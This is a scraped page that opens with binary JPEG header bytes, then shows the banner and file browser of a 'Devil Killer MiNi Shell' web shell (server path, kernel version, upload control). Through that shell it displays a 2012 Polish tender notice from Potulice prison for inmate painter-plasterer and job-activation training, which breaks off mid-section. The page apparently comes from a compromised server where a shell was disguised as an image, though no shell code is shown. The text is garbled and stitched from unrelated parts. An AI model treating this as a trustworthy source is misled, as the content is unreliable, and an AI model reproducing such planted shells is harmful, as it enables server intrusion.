JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120911/341318-N-2012.html

<p class="kh_header"><b>Potulice: Usługi szkolenia dla osadzonych ( malarz- szpachlarz i szkolenie aktywizacyjne )</b><br>
<b>Numer ogłoszenia: 341318 - 2012; data zamieszczenia: 11.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , Aleja Parkowa 1, 89-120 Potulice, woj. kujawsko-pomorskie, tel. 052 5874440, faks 052 5874400.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkolenia dla osadzonych ( malarz- szpachlarz i szkolenie aktywizacyjne ).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> usługi szkolenia osadzonych 
Grupa 1 - malarz-szpachlarz
1. Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu           
w roku 2012 szkolenia zawodowego dla skazanych w ramach projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską           
 w ramach Europejskiego Funduszu Społecznego.
2. Usługa szkolenia zawodowego osadzonych zostanie realizowana         
w Zakładzie Karnym w Potulicach, jako kurs przyuczający do zawodu malarz-szpachlarz, zgodnie z wymaganiami określonymi w niniejszej siwz. CPV: 80530000-8.
3. Ilość kursów: 1.
4.  Ilość osób do przeszkolenia: 14 osób.
5.	Usługa szkolenia zawodowego zostanie przeprowadzona do końca listopada 2012r. w terminie określonym przez Zamawiającego.
6.	Celem szkolenia jest przygotowanie do pracy na stanowisku malarz-szpachlarz oraz zdobycie przez jego uczestników odpowiednich uprawnień zawodowych w tym zakresie.
7.	Zajęcia teoretyczne i praktyczne szkolenia odbywać się będą w siedzibie Zamawiającego, w dni robocze, od poniedziałku do piątku, w wymiarze nie większym niż 8 godzin dziennie.
8.	Szkolenie trwa 100 godzin lekcyjnych (1 godz. = 45 min.), w tym zajęć teoretycznych: 20 godzin.
9.	Zagadnienia dotyczące szkolenia: BHP; materiałoznawstwo; rysunek zawodowy; technologia z elementami maszynoznawstwa; zajęcia praktyczne (nabycie umiejętności malarsko - szpachlarskich).
10.	Przed rozpoczęciem kursu wykonawca zapewnia wszystkim uczestnikom szkolenia (wraz z osobami rezerwowymi) wszelkie badania lekarskie uprawniające kursantów do uczestnictwa w kursie, spełniające wymagania badań zawodowych na stanowisko malarza - szpachlarza, przeprowadzenie badań lekarskich odbędzie się  w siedzibie Zamawiającego.
11.	Przed rozpoczęciem szkolenia, wykonawca zapoznaje uczestników            
z szczegółowym programem szkolenia oraz przedstawia im harmonogram realizowanych zajęć.
12.	Wykonawca ubezpiecza uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
13.	Wykonawca zapewnia uczestnikom szkolenia wszelkie materiały i sprzęt niezbędny do przeprowadzenia niniejszego szkolenia, w tym artykuły biurowe oraz odzież i obuwie ochronne dla każdego uczestnika (wartość materiałów użytych w procesie szkolenia nie może przekroczyć 40% wartości szkolenia).
14.	Wykonawca zapewnia kadrę dydaktyczną o odpowiednich kwalifikacjach do prowadzenia niniejszego szkolenia zawodowego.
15.	Wykonawca przed rozpoczęciem realizacji szkolenia przedstawia program szkolenia zawodowego, sporządzony zgodnie z Rozporządzeniem Ministra Sprawiedliwości w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych z dnia 13 lutego 2004r. (Dz. U. Nr 37, poz. 337) oraz Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia na rynku pracy (Dz. U. Nr 47, poz. 315) zawierający                w szczególności: nazwę i zakres szkolenia; czas trwania i sposób organizacji szkolenia; wymagania wstępne dla uczestników szkolenia; cele szkolenia; plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar,                        z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej; treści szkolenia w zakresie poszczególnych zajęć edukacyjnych; wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych; sposób sprawdzania efektów szkolenia; dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia; przeprowadzenie kursu zgodnie z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.); prowadzenie dokumentacji przebiegu szkolenia tj. m.in.: dziennika zajęć edukacyjnych zawierającego listę obecności, wymiar godzin i tematy zajęć edukacyjnych; programu nauczania, protokołu z egzaminu (jeżeli został przeprowadzony); rejestru wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji; ankiet oceny szkolenia i wykładowcy dla uczestników i absolwentów szkolenia, dodatkową listę obecności podpisywaną przez poszczególnych uczestników kursu.  
16.	Wykonawca przeprowadza wśród uczestników szkolenia ocenę merytorycznego i technicznego przebiegu szkolenia m.in. na podstawie formularza ankiety oceniającej. 
17.	W przypadku zajęć praktycznych, wykonawca przed rozpoczęciem realizacji szkolenia wyszczególnia na piśmie sprzęt, urządzenia i ich ilości, jakie będą wykorzystywane podczas zajęć.
18.	Wykonawca odpowiada za przeszkolenie kursantów w zakresie BHP oraz za przestrzeganie warunków BHP w trakcie całego szkolenia.
19.	Szkolenie kończy się egzaminem i wydaniem zaświadczenia potwierdzającego zakres przeszkolenia oraz wydaniem odpowiedniego świadectwa kwalifikacji zawodowych. 
20.	Szkolenie kończy się oceną nabytych umiejętności i wydaniem zaświadczeń o jego ukończeniu, zgodnie z rozporządzeniem MEN oraz MPiPS z dnia 12.10.1993r. w sprawie zasad i warunków podnoszenia kwalifikacji zawodowych 
i wykształcenia ogólnego dorosłych (Dz. U. Nr 103, poz. 472 z późn. zmianami) oraz rozporządzeniem MEN z dnia 11.01 2012r. (Dz. U. Nr 34 poz. 186 
z 2012r) w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych oraz certyfikatu 
w zakresie zdobytych uprawnień. Oryginały   w/w dokumentów i ich kserokopie mają być potwierdzone za zgodność z oryginałem i przekazane do Zakładu Karnego 
w Potulicach.
21.	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia oraz              
za należytą staranność przy realizacji zobowiązań umowy.
22.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
23.	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem Wykonawcy.
24.	Wykonawca określa numery telefonów kontaktowych i faksu oraz innych danych niezbędnych dla sprawnego i terminowego wykonania zamówienia.
25.	Należność za usługę szkolenia zawodowego zostanie uregulowana przelewem, w terminie 30 dni, od daty otrzymania faktury przez zamawiającego 
za przeprowadzenie kursu.
26.	Niniejsza część postępowania dotycząca grupy 1 może zostać unieważniona na podstawie art. 93 ust. 1a ustawy Pzp.


Grupa 2 - szkolenie aktywizacyjne:
	 1)   Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu              
w roku 2012r. Szkolenia aktywizacyjnego dla skazanych w związku z realizacją projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności               
w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
	2)	Usługa szkolenia aktywizacyjnego osadzonych zostanie realizowana              w Zakładzie Karnym w Potulicach, zgodnie z wymaganiami określonymi               
w niniejszej siwz. CPV: 80500000-9.
	3)	ilość kursów: 1
4)         ilość osób do przeszkolenia: 14 osób 
5)	         Usługi szkolenia aktywizacyjnego zostaną przeprowadzone do końca listopada 2012r. w terminach określonych przez Zamawiającego.
6)   Celem szkolenia jest nabycie przez beneficjentów podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy - zagadnienia: autoprezentacja; komunikacja z pracodawcą; rozmowa kwalifikacyjna; dokumenty aplikacyjne; sposoby poszukiwania pracy; poznawanie i odkrywanie swoich umiejętności i predyspozycji zawodowych.
7)	         Szkolenia odbywać się będą w siedzibie Zamawiającego, w dni robocze, 
od poniedziałku do piątku, w wymiarze nie większym niż 8 godzin dziennie.
8)         Szkolenie trwa 20 godzin lekcyjnych (1 godz. = 45 min.).
9)        Wykonawca zapewnia kadrę dydaktyczną o kwalifikacjach odpowiednich 
do prowadzenia zajęć psychokorekcyjnych oraz doradztwa zawodowego.
10)   Przed rozpoczęciem szkolenia, wykonawca informuje beneficjentów ostatecznych o tym, że szkolenie jest współfinansowane z przez Unię Europejską - Europejski Fundusz Społeczny w ramach Programu Operacyjnego Kapitał Ludzki, oraz zapoznaje uczestników z szczegółowym programem szkolenia oraz przedstawia im harmonogram realizowanych zajęć.
11)  Wykonawca ubezpiecza uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
12)      Wykonawca zapewnia uczestnikom szkolenia wszelkie materiały i sprzęt niezbędny do przeprowadzenia szkolenia aktywizacyjnego, a Zamawiający        
 we własnym zakresie dostarczy sprzęt multimedialny.
13)     Wykonawca przed rozpoczęciem realizacji szkolenia przedstawia program szkolenia, sporządzony zgodnie z Rozporządzeniem Ministra Sprawiedliwości 
w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych z dnia 13 lutego 2004r. (Dz. U. Nr 37, poz. 337) oraz Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia na rynku pracy (Dz. U. Nr 47, poz. 315) zawierający w szczególności: nazwę i zakres szkolenia; czas trwania i sposób organizacji szkolenia; wymagania wstępne dla uczestników szkolenia; cele szkolenia; plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar,    z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej; treści szkolenia w zakresie poszczególnych zajęć edukacyjnych; wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych; sposób sprawdzania efektów szkolenia; dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia; przeprowadzenie kursu zgodnie z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.); prowadzenie dokumentacji przebiegu szkolenia tj. m.in.: dziennika zajęć edukacyjnych, programu nauczania, wymiar godzin i tematy zajęć edukacyjnych, protokołu z egzaminu (jeżeli został przeprowadzony), rejestru wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, ankiet oceny szkolenia i wykładowcy dla uczestników i absolwentów szkolenia, listę obecności podpisywaną przez poszczególnych beneficjentów ostatecznych i wykładowcy. Lista obecności powinna być podpisana kolorem niebieskim   lub zielonym.
14)   Wykonawca przeprowadza wśród uczestników szkolenia ocenę merytorycznego i technicznego przebiegu szkolenia m.in. na podstawie formularza ankiety oceniającej. 
15)     W przypadku zajęć praktycznych, wykonawca przed rozpoczęciem realizacji szkolenia wyszczególnia na piśmie sprzęt i urządzenia oraz ich ilości, jakie będą wykorzystywane podczas zajęć.
16)       Wykonawca odpowiada za przestrzeganie warunków i przepisów BHP 
w trakcie całego szkolenia.
17)   Szkolenie kończy się oceną nabytych umiejętności i wydaniem zaświadczeń 
o jego ukończeniu, zgodnie z rozporządzeniem MEN oraz MPiPS z dnia 12.10.1993r. w sprawie zasad i warunków podnoszenia kwalifikacji zawodowych 
i wykształcenia ogólnego dorosłych (Dz. U. Nr 103, poz. 472 z późn. zmianami) oraz rozporządzeniem MEN z dnia 11.01 2012r. (Dz. U. Nr 34, poz. 186 z 2012r) 
w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych oraz certyfikatu 
w zakresie zdobytych uprawnień. Oryginały   w/w dokumentów i ich kserokopie potwierdzone za zgodność z oryginałem mają być przekazane do Zakładu Karnego w Potulicach.
18)    Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia oraz za należytą staranność przy realizacji zobowiązań umowy.
19)      Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
20)     Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem Wykonawcy.
21)       Wykonawca określa numery telefonów kontaktowych i faksu oraz innych danych niezbędnych dla sprawnego i terminowego wykonania zamówienia.
22)   Należność za usługi szkolenia aktywizacyjnego zostanie uregulowana przelewem, w terminie 30 dni, od daty otrzymania faktury przez zamawiającego 
za przeprowadzenie kursu.
23)  Niniejsza część postępowania dotycząca grupy 2 może zostać unieważniona na podstawie art. 93 ust. 1a ustawy Pzp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz o wpisaniu wykonawcy do rejestru instytucji szkoleniowych (załącznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Wykonawca spełnieni warunek, o którym mowa w art. 22 ust. 1 pkt 2 ustawy Pzp, określony w siwz rozdział VIII pkt 1 ppkt 2), tj. posiadania wiedzy i doświadczenia, jeżeli wykaże się, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przeprowadził szkolenie dotyczące: a)	minimum jednego kursu przyuczającego do zawodu malarz-szpachlarz dla minimum 10 osób, lub szkolenia o podobnej tematyce, którego cel 
i zakres szkolenia był tożsamy z celem i zakresem określonym w siwz 
w rozdziale III;
b)	minimum jednego szkolenia aktywizacyjnego dla minimum 10 osób, lub szkolenia o podobnej tematyce, którego cel szkolenia był tożsamy z celem określonym w siwz w rozdziale III.
c)	na potwierdzenie wykonania usługi szkolenia wykonawca załącza 
do oferty dokumenty (np. referencje) wystawione po zrealizowaniu całości szkolenia, potwierdzające, że usługa została wykonana należycie.
d)	przez wykonanie usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert (tj. od 20.09.2009r. do 20.09.2012r.), zamawiający rozumie zakończenie realizacji usługi w w/w okresie.
e)	wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia wykazują, że łącznie spełniają w/w warunek.
4) Wykonawca spełnieni warunek, o którym mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, określony w siwz rozdział VIII pkt 1 ppkt 3), tj. dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia, jeżeli wykaże się, że osoby(a), które będą uczestniczyć w wykonywaniu zamówienia posiadają uprawnienia wynikające z ustawy o systemie oświaty (Dz. U. z 2004r. Nr 256, poz. 2572, z późn. zm.) oraz z rozporządzenia Ministra Edukacji Narodowej z dnia 15 grudnia 3. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu, na podstawie złożonego do oferty wykazu, o którym mowa w siwz rozdział IX, tj.: 1) podpisany i wypełniony wykaz wykonanych usług w zakresie niezbędnym do wykazania spełniania warunku dotyczącego wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentu(ów) potwierdzającego, że te usługi zostały wykonane należycie - (załącznik nr 4 do siwz)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz o wpisaniu wykonawcy do rejestru instytucji szkoleniowych (załącznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Wykonawca spełnieni warunek, o którym mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, określony w siwz rozdział VIII pkt 1 ppkt 3), tj. dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia, jeżeli wykaże się, że osoby(a), które będą uczestniczyć w wykonywaniu zamówienia posiadają uprawnienia wynikające z ustawy o systemie oświaty (Dz. U. z 2004r. Nr 256, poz. 2572, z późn. zm.) oraz z rozporządzenia Ministra Edukacji Narodowej z dnia 15 grudnia 2010r. w sprawie praktycznej nauki zawodu (Dz. U. z 2010r. Nr 244, poz. 1626). 1) Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia wykazują, że łącznie spełniają w/w warunek. 3. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, że osoby(a), które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia do prowadzenia szkoleń/kursów określonych w niniejszej siwz, wynikające z ustawy o systemie oświaty (Dz. U. z 2004r. Nr 256, poz. 2572, z późn. zm.) oraz z rozporządzenia Ministra Edukacji Narodowej z dnia 15 grudnia 2010r. w sprawie praktycznej nauki zawodu (Dz. U. z 2010r. Nr 244, poz. 1626) - (załącznik nr 5 do siwz).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz o wpisaniu wykonawcy do rejestru instytucji szkoleniowych (załącznik nr 2 do siwz).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
